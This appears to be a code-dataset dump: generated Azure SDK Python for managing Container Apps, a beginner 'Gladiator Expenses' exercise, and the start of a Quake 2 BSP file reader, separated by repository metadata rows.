template_url=self.list_by_resource_group.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
# make call to next link with the client's api-version
_parsed_next_link = urllib.parse.urlparse(next_link)
_next_request_params = case_insensitive_dict(
{
key: [urllib.parse.quote(v) for v in value]
for key, value in urllib.parse.parse_qs(_parsed_next_link.query).items()
}
)
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest(
"GET", urllib.parse.urljoin(next_link, _parsed_next_link.path), params=_next_request_params
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("ContainerAppCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem) # type: ignore
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(get_next, extract_data)
list_by_resource_group.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps"
}
@distributed_trace
def get(self, resource_group_name: str, container_app_name: str, **kwargs: Any) -> _models.ContainerApp:
"""Get the properties of a Container App.
Get the properties of a Container App.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param container_app_name: Name of the Container App. Required.
:type container_app_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ContainerApp or the result of cls(response)
:rtype: ~azure.mgmt.appcontainers.models.ContainerApp
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
404: lambda response: ResourceNotFoundError(response=response, error_format=ARMErrorFormat),
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[_models.ContainerApp] = kwargs.pop("cls", None)
request = build_get_request(
resource_group_name=resource_group_name,
container_app_name=container_app_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("ContainerApp", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}"
}
def _create_or_update_initial(
self,
resource_group_name: str,
container_app_name: str,
container_app_envelope: Union[_models.ContainerApp, IO],
**kwargs: Any
) -> _models.ContainerApp:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.ContainerApp] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(container_app_envelope, (IO, bytes)):
_content = container_app_envelope
else:
_json = self._serialize.body(container_app_envelope, "ContainerApp")
request = build_create_or_update_request(
resource_group_name=resource_group_name,
container_app_name=container_app_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self._create_or_update_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize("ContainerApp", pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize("ContainerApp", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {}) # type: ignore
return deserialized # type: ignore
_create_or_update_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}"
}
@overload
def begin_create_or_update(
self,
resource_group_name: str,
container_app_name: str,
container_app_envelope: _models.ContainerApp,
*,
content_type: str = "application/json",
**kwargs: Any
) -> LROPoller[_models.ContainerApp]:
"""Create or update a Container App.
Create or update a Container App.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param container_app_name: Name of the Container App. Required.
:type container_app_name: str
:param container_app_envelope: Properties used to create a container app. Required.
:type container_app_envelope: ~azure.mgmt.appcontainers.models.ContainerApp
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either ContainerApp or the result of
cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.appcontainers.models.ContainerApp]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
def begin_create_or_update(
self,
resource_group_name: str,
container_app_name: str,
container_app_envelope: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> LROPoller[_models.ContainerApp]:
"""Create or update a Container App.
Create or update a Container App.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param container_app_name: Name of the Container App. Required.
:type container_app_name: str
:param container_app_envelope: Properties used to create a container app. Required.
:type container_app_envelope: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either ContainerApp or the result of
cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.appcontainers.models.ContainerApp]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace
def begin_create_or_update(
self,
resource_group_name: str,
container_app_name: str,
container_app_envelope: Union[_models.ContainerApp, IO],
**kwargs: Any
) -> LROPoller[_models.ContainerApp]:
"""Create or update a Container App.
Create or update a Container App.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param container_app_name: Name of the Container App. Required.
:type container_app_name: str
:param container_app_envelope: Properties used to create a container app. Is either a model
         type or an IO type. Required.
:type container_app_envelope: ~azure.mgmt.appcontainers.models.ContainerApp or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either ContainerApp or the result of
cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.appcontainers.models.ContainerApp]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.ContainerApp] = kwargs.pop("cls", None)
polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
container_app_name=container_app_name,
container_app_envelope=container_app_envelope,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("ContainerApp", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method: PollingMethod = cast(PollingMethod, ARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(PollingMethod, NoPolling())
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_create_or_update.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}"
}
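    # --- Illustrative usage sketch (assumptions: the client shown earlier, plus a minimal
    # ContainerApp envelope; the environment id and image below are placeholders) ---
    #
    #     from azure.mgmt.appcontainers import models
    #
    #     envelope = models.ContainerApp(
    #         location="eastus",
    #         managed_environment_id="<managed-environment-resource-id>",
    #         template=models.Template(
    #             containers=[models.Container(name="main", image="mcr.microsoft.com/k8se/quickstart:latest")]
    #         ),
    #     )
    #     poller = client.container_apps.begin_create_or_update("my-rg", "my-app", envelope)
    #     created = poller.result()  # blocks until the long-running operation completes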
def _delete_initial( # pylint: disable=inconsistent-return-statements
self, resource_group_name: str, container_app_name: str, **kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[None] = kwargs.pop("cls", None)
request = build_delete_request(
resource_group_name=resource_group_name,
container_app_name=container_app_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self._delete_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}"
}
@distributed_trace
def begin_delete(self, resource_group_name: str, container_app_name: str, **kwargs: Any) -> LROPoller[None]:
"""Delete a Container App.
Delete a Container App.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param container_app_name: Name of the Container App. Required.
:type container_app_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[None] = kwargs.pop("cls", None)
polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = self._delete_initial( # type: ignore
resource_group_name=resource_group_name,
container_app_name=container_app_name,
api_version=api_version,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements
if cls:
return cls(pipeline_response, None, {})
if polling is True:
polling_method: PollingMethod = cast(PollingMethod, ARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(PollingMethod, NoPolling())
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_delete.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}"
}
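    # Illustrative usage sketch (same assumed client as above): deletion is a long-running
    # operation, so call .result() on the poller to wait for it to finish.
    #
    #     client.container_apps.begin_delete("my-rg", "my-app").result()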
def _update_initial(
self,
resource_group_name: str,
container_app_name: str,
container_app_envelope: Union[_models.ContainerApp, IO],
**kwargs: Any
) -> Optional[_models.ContainerApp]:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[Optional[_models.ContainerApp]] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(container_app_envelope, (IO, bytes)):
_content = container_app_envelope
else:
_json = self._serialize.body(container_app_envelope, "ContainerApp")
request = build_update_request(
resource_group_name=resource_group_name,
container_app_name=container_app_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self._update_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("ContainerApp", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}"
}
@overload
def begin_update(
self,
resource_group_name: str,
container_app_name: str,
container_app_envelope: _models.ContainerApp,
*,
content_type: str = "application/json",
**kwargs: Any
) -> LROPoller[_models.ContainerApp]:
"""Update properties of a Container App.
Patches a Container App using JSON Merge Patch.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param container_app_name: Name of the Container App. Required.
:type container_app_name: str
:param container_app_envelope: Properties of a Container App that need to be updated. Required.
:type container_app_envelope: ~azure.mgmt.appcontainers.models.ContainerApp
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either ContainerApp or the result of
cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.appcontainers.models.ContainerApp]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
def begin_update(
self,
resource_group_name: str,
container_app_name: str,
container_app_envelope: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> LROPoller[_models.ContainerApp]:
"""Update properties of a Container App.
Patches a Container App using JSON Merge Patch.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param container_app_name: Name of the Container App. Required.
:type container_app_name: str
:param container_app_envelope: Properties of a Container App that need to be updated. Required.
:type container_app_envelope: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either ContainerApp or the result of
cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.appcontainers.models.ContainerApp]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace
def begin_update(
self,
resource_group_name: str,
container_app_name: str,
container_app_envelope: Union[_models.ContainerApp, IO],
**kwargs: Any
) -> LROPoller[_models.ContainerApp]:
"""Update properties of a Container App.
Patches a Container App using JSON Merge Patch.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param container_app_name: Name of the Container App. Required.
:type container_app_name: str
:param container_app_envelope: Properties of a Container App that need to be updated. Is either
        a model type or an IO type. Required.
:type container_app_envelope: ~azure.mgmt.appcontainers.models.ContainerApp or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either ContainerApp or the result of
cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.appcontainers.models.ContainerApp]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.ContainerApp] = kwargs.pop("cls", None)
polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = self._update_initial(
resource_group_name=resource_group_name,
container_app_name=container_app_name,
container_app_envelope=container_app_envelope,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("ContainerApp", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method: PollingMethod = cast(PollingMethod, ARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(PollingMethod, NoPolling())
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_update.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}"
}
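    # Illustrative usage sketch (assumption, not part of the generated code): begin_update
    # applies a JSON Merge Patch, so only the fields present in the envelope are changed.
    # The names and tag values below are placeholders.
    #
    #     patch = models.ContainerApp(location="eastus", tags={"owner": "team-a"})
    #     updated = client.container_apps.begin_update("my-rg", "my-app", patch).result()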
@distributed_trace
def list_custom_host_name_analysis(
self, resource_group_name: str, container_app_name: str, custom_hostname: Optional[str] = None, **kwargs: Any
) -> _models.CustomHostnameAnalysisResult:
"""Analyzes a custom hostname for a Container App.
Analyzes a custom hostname for a Container App.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param container_app_name: Name of the Container App. Required.
:type container_app_name: str
:param custom_hostname: Custom hostname. Default value is None.
:type custom_hostname: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CustomHostnameAnalysisResult or the result of cls(response)
:rtype: ~azure.mgmt.appcontainers.models.CustomHostnameAnalysisResult
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[_models.CustomHostnameAnalysisResult] = kwargs.pop("cls", None)
request = build_list_custom_host_name_analysis_request(
resource_group_name=resource_group_name,
container_app_name=container_app_name,
subscription_id=self._config.subscription_id,
custom_hostname=custom_hostname,
api_version=api_version,
template_url=self.list_custom_host_name_analysis.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("CustomHostnameAnalysisResult", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_custom_host_name_analysis.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}/listCustomHostNameAnalysis"
}
@distributed_trace
def list_secrets(
self, resource_group_name: str, container_app_name: str, **kwargs: Any
) -> _models.SecretsCollection:
"""List secrets for a container app.
List secrets for a container app.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param container_app_name: Name of the Container App. Required.
:type container_app_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SecretsCollection or the result of cls(response)
:rtype: ~azure.mgmt.appcontainers.models.SecretsCollection
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[_models.SecretsCollection] = kwargs.pop("cls", None)
request = build_list_secrets_request(
resource_group_name=resource_group_name,
container_app_name=container_app_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_secrets.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("SecretsCollection", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_secrets.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}/listSecrets"
}
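    # Illustrative usage sketch (same assumed client): the returned SecretsCollection
    # exposes a ``value`` list of secret entries.
    #
    #     secrets = client.container_apps.list_secrets("my-rg", "my-app")
    #     for secret in secrets.value:
    #         print(secret.name)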
@distributed_trace
def get_auth_token(
self, resource_group_name: str, container_app_name: str, **kwargs: Any
) -> _models.ContainerAppAuthToken:
"""Get auth token for a container app.
Get auth token for a container app.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param container_app_name: Name of the Container App. Required.
:type container_app_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ContainerAppAuthToken or the result of cls(response)
:rtype: ~azure.mgmt.appcontainers.models.ContainerAppAuthToken
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
404: lambda response: ResourceNotFoundError(response=response, error_format=ARMErrorFormat),
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-10-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[_models.ContainerAppAuthToken] = kwargs.pop("cls", None)
request = build_get_auth_token_request(
resource_group_name=resource_group_name,
container_app_name=container_app_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get_auth_token.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("ContainerAppAuthToken", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_auth_token.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.App/containerApps/{containerAppName}/getAuthtoken"
}
| [
"[email protected]"
] | |
17f68468ed1bec0220733058ab02887e08228ee7 | 1e8c4293d02cd72297eb80aab776cc8dffb71690 | /Data Types and Variables/10.Gladiator Expenses.py | 2eee653802d2b6b8caa110d2fcbf652bf9b1e498 | [] | no_license | deyandyankov1/Fundamentals | cacdf8f4c9aeee02ffd5f91ba5494f6c4cdc504a | 0152e8f307a44b7ee355a4020405e6e1e42ab1e6 | refs/heads/main | 2023-02-25T11:36:14.840005 | 2021-02-02T10:46:44 | 2021-02-02T10:46:44 | 330,765,629 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 697 | py | lost_fights_count = int(input())
helmet_price = float(input())
sword_price = float(input())
shield_price = float(input())
armor_price = float(input())
sum_for_repair = 0
broken_shield_count = 0
for lost_fight in range(1, lost_fights_count +1):
if lost_fight % 2 == 0:
sum_for_repair += helmet_price
if lost_fight % 3 == 0:
sum_for_repair += sword_price
if lost_fight % 2 == 0 and lost_fight % 3 == 0:
sum_for_repair += shield_price
broken_shield_count += 1
if broken_shield_count % 2 == 0 and not broken_shield_count == 0:
sum_for_repair += armor_price
print(f"Gladiator expenses: {sum_for_repair:.2f} aureus") | [
"[email protected]"
] | |
cd979cf383863e27fac2a067d8e949630956d387 | e82b761f53d6a3ae023ee65a219eea38e66946a0 | /All_In_One/addons/io_scene_md2/quake2/bsp.py | fd4a108bf3ac3eaa8e59362e0ea2f1064605f00e | [] | no_license | 2434325680/Learnbgame | f3a050c28df588cbb3b14e1067a58221252e2e40 | 7b796d30dfd22b7706a93e4419ed913d18d29a44 | refs/heads/master | 2023-08-22T23:59:55.711050 | 2021-10-17T07:26:07 | 2021-10-17T07:26:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 35,530 | py | """This module provides file I/O for Quake 2 BSP map files.
Example:
bsp_file = bsp.Bsp.open('base1.bsp')
References:
Quake 2 Source
